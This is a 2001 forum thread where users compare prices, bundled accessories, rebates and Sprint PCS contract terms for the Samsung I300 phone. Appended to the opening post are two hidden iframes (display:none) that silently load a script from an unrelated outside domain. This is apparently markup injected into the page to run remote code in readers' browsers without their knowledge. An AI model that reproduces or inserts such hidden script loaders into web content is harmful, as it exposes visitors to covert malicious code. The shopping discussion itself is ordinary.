+ Reply to Thread
Page 1 of 2 1 2 LastLast

Question Best place to pick up an I300 and what does it come with by default?

Hey, i'm looking into picking up an I300, but I have two quick questions...

1. What does the actual "packaging" include from Samsung. I've read conflicting reports of what you get (1 battery, 2 batteries, case, charger/sync cradle). If I order it through Sprint Online, it seems like I get a travel adapter, etc.. Can someone clear this up? I wouldn't mind paying $500 from Sprint if I got some extra accessories out of the deal, but if Sprint doesn't include an extra battery, then it isn't that useful....

2. From reading the posts, a lot of people mentioned Best Buy.. Well I call the Best Buy's around me here in central/south jersey but no one has any stock of I300s... Anyone have any other luck with other stores?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by wgalway; 11-27-2001 at 10:41 AM.

All I300s come with two batteries, a charger/sync cradle, and a leather case no matter who you purchase the phone from. The extra leather case from Sprint is absolutely useless (poorly designed) so don't let that accessory factor into your decision to buy from Sprint. The other accessories might be worth it though. If you can't find the I300 at Best Buy, try your local Sprint store as well as CompUSA. I think I remember reading amazon.com had some as well for a discount as long as you sign up for service right then and there.

Thanks for the info... Alright... I went to Comp USA and The Wiz during lunch and both of them had it for $499, with no real discounts.... But I swear when I called Sprint on the phone, they said that it didn't come with two batteries...

I still think Best Buy will be my best bet, but I need them to have it in stock first, as I keep reading posts of people getting rebates and or extra stuff from Best Buy..

The one thing that made me angry was that neither Comp USA or The Wiz had a display model available and neither would let me open the box to physically even see the phone. They couldn't understand the "I'm not spending $500 for a phone that I can't hold first" arguement... Silly

I'll keep looking though..

Will

The morning after Thanksgiving, Best Buy had it for $399. I got there around 11am and they said they "just sold their last 2..." hmmm coincidence???

Anyways, they're price is back up to $499 for this week. However they have a $100 mail in gift card for all cell phone purchases. So it's kinda like $399 again, but it's in store credit.

I'm ordering through Sprint... You get the accessories and some added minutes.

I was thinking of ordering from Sprint as well, except that both times that I called today when I asked about it, they said that the I300 only came with one battery...

Now I know the hands free ear bud is kinda cool, but it's not worth the price of that extra battery

So... I tracked down an I300 at a Best Buy about 45 minutes from me... I will take advantage of that $100 gift card as well.

Good Luck!
    Will

Administrator

Arrow

dont let sprint reps fool you..

the phone comes witih 2 batteries... it says so on the package and the sprint website...

Got mine through my company's Sprint sales rep. It cost about $440 and came with the useless leather case, charger/synch cradle, and two batteries.

Comp USA Package

I got the I300, 2 batteries, charging cradle, 2 stylus', leather portfolio (useless), manuals and CD Rom.

$499.00 with $100.00 gift card rebate.

Handsfree ear bud costs $10 at Sprint store

Handsfree ear bud only costs $10 at Sprint store

Originally posted by wgalway
    I was thinking of ordering from Sprint as well, except that both times that I called today when I asked about it, they said that the I300 only came with one battery...

Now I know the hands free ear bud is kinda cool, but it's not worth the price of that extra battery

So... I tracked down an I300 at a Best Buy about 45 minutes from me... I will take advantage of that $100 gift card as well.

Good Luck!
    Will

Smile Cheap option for I300

Ok, you have to be a deal hound to get the best price on this one...

Requirements:
    * First you must be a Microsoft Passport Member
    http://www.passport.com/

* Second, you must be a an Ebates Member
    http://www.ebates.com/

The Deal
    Go to Ebates, login, and find 800.com in the electronics section. It is important to start your shopping through Ebates.

After at 800.com search for "SPRSPHI300". You will be asked about buying it for an existing plan or a new plan with Sprint. Choose which is applicable for you.

When asked if you want the "Original Earpiece and Microphone" add it to your shopping cart (assuming you need one).

All of this will show in your shopping cart like such:

--------------------------
    Shopping Cart Items:

Samsung SPRSPHI300 Wireless Phone/PDA $499.99
    Shipping 7.95

Samsung Original Earpiece and Microphone $19.95
    Shipping 3.95

Total Item Cost $531.84

Coupons/Credits:
    $50 Gift Check with Purchase! -$50.00
    All Sprint PCS Phones on Sale! -$25.00
    All Electronics on Sale! -$26.00
    20% Off All Hands-Free Solutions -$3.99

Total discount -$104.99

** Total Out of Pocket Expense: $476.85

----------------------------

NOTE: When you go to check out, make sure you click the "Passport Express Purchase" not "Go To Secure Checkout." When you check out via passport you will qualify for a MSN eShop Reward.

Now for the Fun Part
    So at this point you are spending $476.85 but should get 3% cash back via Ebates, plus $80.00 cash back via MSN. Plus you can apply for the SprintPCS $30.00 rebate if this is a new activation.

If you really want some fun, add a DVD (or whatever you like to your cart) to bump you over $500.00 then you qualify for the full $100.00 rebate from MSN.

The Total Possibility of the Deal

- I300 phone
    - headset
    - Some 25.00 item from 800.com
    - a $50.00 gift check for more 800.com merchandise

aprox $500.00 out-of-pocket
    - $100.00 cash back from MSN
    - $ 15.00 cash back from Ebates
    - $ 30.00 cash back from Sprint (if new account)
    ------------
    $355.00 Net cost

Well, like I said you have to be a deal hound to get this price but if you are willing to jump through some hoops and wait for the cash back...it is a great dael for the phone, headset and $75.00 worth of other merchandise from 800.com.

Please note that this deal will start to sour soon. So if you want to get in I think parts of it go away early in December.

-Brainjuice
    Last edited by brainjuice; 11-28-2001 at 03:40 PM.

Administrator

Arrow

brainjuice, you are inded a hound...

thats a great offer... if you find anymore in the future, please drop a dime.

curious... are you/did you get a i300 with this offer>?

Marctronixx, yes I did buy with this deal. Still waiting for the phone to ship.

-Brainjuice

If you don't want to work quite so hard, I just saw saw the I300 at Circuit City today for $389.

Adam

Bought 2 in the past few days, 1 at Best Buy. They had several. 800.com had them until yesterday, but sold out overnight. They've dropped out of MSN Passport BTW, so forget the 20% checks. They're also available (or were) at Amazon, the Sprint online store, and local CompUSA's but they sell out fast there. Paid $449 at BB - $60 rebate for new SprintPCS signups. Why do I have 2? Dunno really.

Talking Best place to buy the i300

Without a doubt EBAY!! I got mine at about $120 off plus no tax Gotta love that!

Ha! Mark from CT, what part of CT are you in and which Best Buy store did you go to? Check this out...

The morning of the day after Thanksgiving, I called the Best Buy in Manchester, CT. They told me they had two. I didn't bother to ask them to hold them for me since I figured they'd say no given the sale going on. I rushed down there and got there about 9am (I think - it could have been closer to 10am).

I asked them if they still had them, they said yes and they'd hold them for me behind the counter since I had to wait in a super-long line.

So, bottom line, I bought two of them at the Best Buy in Manchester, CT the morning after Thanksgiving. Sorry.

Not to rub it in, but here's the deal I got (or should be getting)...

The phones were on sale for $399, I believe. Total cost, approximately $800. Then, Best Buy was offering a $100 Gift card for each phone (after mail-in). Plus, Sprint had/has a rebate for $30 off one phone or, in my case, $100 off two phones. Total cost will end up equating to $500 for two phones (or $250 each).

That said, I'm not 100% sure that I love mine. My wife is happy with hers, but I'm less than thrilled with mine. Note that I'm an overly critical person who has gone from an old Palm Pilot 5000 to a Compaq iPaq who discovered that I couldn't stand the PPC OS. So, in my quest to find the perfect Palm, I bought a Visor Prism (still have it but not using it - may sell it - may not) to a Kyocera 6035 on Verizon (liked the convergence of it but couldn't live with the B&W screen) to my new i300. The reason I'm mentioning this is that there's a possibility I could be willing to sell it. My problem is that I'm now locked into the contract with Sprint. If I sold it, I'm thinking of trying out the VisorPhone or getting a standalone phone and a Minstrel modem for the Prism, or holding off and waiting for the next gen devices. Don't get your hopes up, though, as getting out of the contract would be tricky. If I
    had to eat the early-termination cost, I'd have to pass some/all of that onto the buyer which would probably make it a less-than-great deal.

Since I'm now way off topic, anyone have any thoughts as to whether I'm really locked into a contract, anyway? My reasoning is that I haven't sent in any of the rebate forms yet. However, the last time I checked Sprint's web site, all of their service plans now say that they require an annual agreement (if this is true, when did they change this policy - I thought one of their biggest selling points was that they wouldn't lock you in?). Obviously, one easy way to find out (assuming the service reps know what they're talking about) is to call the 800 number, explain my situation, and see what they say. It's possible that they would give me a break since I could make a stink about the lack of a signal at my house and the fact that I'd still be keeping one phone (and, hence, they'd still be making some money off of me).

Scott

You prob. have a $50 cancellation fee depending the rate plan that you chose with Sprint PCS (per phone). Let me know if you are int. in getting out and selling your 300, I am a Sprint PCS Dealer.

Thanks,

Sprintguy

Dan
    Originally posted by Scott R
    However, the last time I checked Sprint's web site, all of their service plans now say that they require an annual agreement (if this is true, when did they change this policy - I thought one of their biggest selling points was that they wouldn't lock you in?).
    Yeah, I've been a PCS customer for about four years and that ticked me off, too. I needed to add a phone to my plan and therefore I now have an "advantage agreement" (which is what they call their contracts). There are three options in this area:

You can pay $10/month to not have a contract.
    You can get a 1-year agreement.
    You can get a 2-year agreement with Technology Assurance.

Technology assurance is essentially a $100 check from Sprint after two years so you can buy a new phone.

According to the Sprint PCS web site, "You may terminate your Agreement to keep Sprint PCS Service before the one year is up by calling us at *2 on your Sprint PCS Phone, or by calling 1-888-211-4727 from any phone. You will be charged an early termination fee of $150."

BUT... "An early termination fee will not be charged if you deactivate within 14 days after activating your Sprint PCS Phone."

The only sunny side to this is the fact that it's only an agreement to have Sprint PCS service, not any level of service. So you can change plans mid-term without extending the duration of the agreement. So you're not locked in to a particular plan, per se, but you are locked in to Sprint PCS service.

Anybody notice if accessories are being sold at any local stores yet (For I300s of course)?
    Best Buy, Circuit City, Sprint Stores?

I purchased from Circuit city ,excellent deal I think.

Phone - $449
    Circuit city Rebate - $30
    Sprint PCS Mail in Rebate - $60

So effectively I paid $359 + taxes